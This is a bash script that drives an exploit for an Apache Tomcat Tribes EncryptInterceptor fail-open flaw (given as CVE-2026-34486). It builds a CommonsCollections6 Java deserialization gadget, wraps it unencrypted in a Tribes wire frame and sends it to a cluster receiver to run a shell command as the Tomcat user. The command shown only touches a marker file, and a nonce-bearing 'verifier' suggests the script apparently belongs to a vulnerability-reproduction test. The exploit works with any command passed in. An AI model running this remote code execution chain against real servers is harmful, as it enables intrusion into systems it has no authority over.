#!/usr/bin/env bash
#
# CVE-2026-34486 — Apache Tomcat Tribes EncryptInterceptor fail-open RCE.
#
# One-shot orchestrator:
#   1. Build a CommonsCollections6 Java deserialization gadget (pure Python, no
#      Java/ysoserial needed) whose payload runs:  touch <MARKER_PATH>
#   2. Wrap the raw (UNENCRYPTED) gadget in a Tomcat Tribes wire frame.
#   3. Send it to the cluster receiver. EncryptInterceptor.messageReceived() in
#      11.0.20 fails open: decrypt() throws GeneralSecurityException, is logged,
#      and super.messageReceived() forwards the raw bytes to
#      XByteBuffer.deserialize() -> ObjectInputStream.readObject() -> gadget fires
#      as the Tomcat service user, creating the marker file.
#
# Args:
#   $1 = target host        (e.g. 127.0.0.1)
#   $2 = target port        (Tribes receiver, e.g. 4000)
#   $3 = marker path        (verifier-dictated path embedding a fresh nonce,
#                            writable by the tomcat user, e.g. /marker/pwned-<nonce>)
set -euo pipefail

HOST="${1:?usage: run.sh <host> <port> <marker_path>}"
PORT="${2:?usage: run.sh <host> <port> <marker_path>}"
MARKER="${3:?usage: run.sh <host> <port> <marker_path>}"

HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
PAYLOAD="$(mktemp)"
trap 'rm -f "$PAYLOAD"' EXIT

echo "[*] target = ${HOST}:${PORT}"
echo "[*] marker = ${MARKER}"

# 1. Build the gadget. The command is passed as an explicit argv array so the
#    target executes exactly: /bin/sh -c "touch <MARKER>".
echo "[*] building CommonsCollections6 gadget (touch ${MARKER}) ..."
python3 "${HERE}/gadget.py" /bin/sh -c "touch ${MARKER}" > "$PAYLOAD"
echo "[*] gadget = $(wc -c < "$PAYLOAD") bytes"

# 2+3. Frame and fire.
echo "[*] sending unencrypted Tribes frame to fail-open EncryptInterceptor ..."
python3 "${HERE}/send.py" "$HOST" "$PORT" "$PAYLOAD"

echo "[*] frame delivered. The gadget executes inside the Tomcat JVM (the"
echo "    verifier observes the marker via its privileged channel)."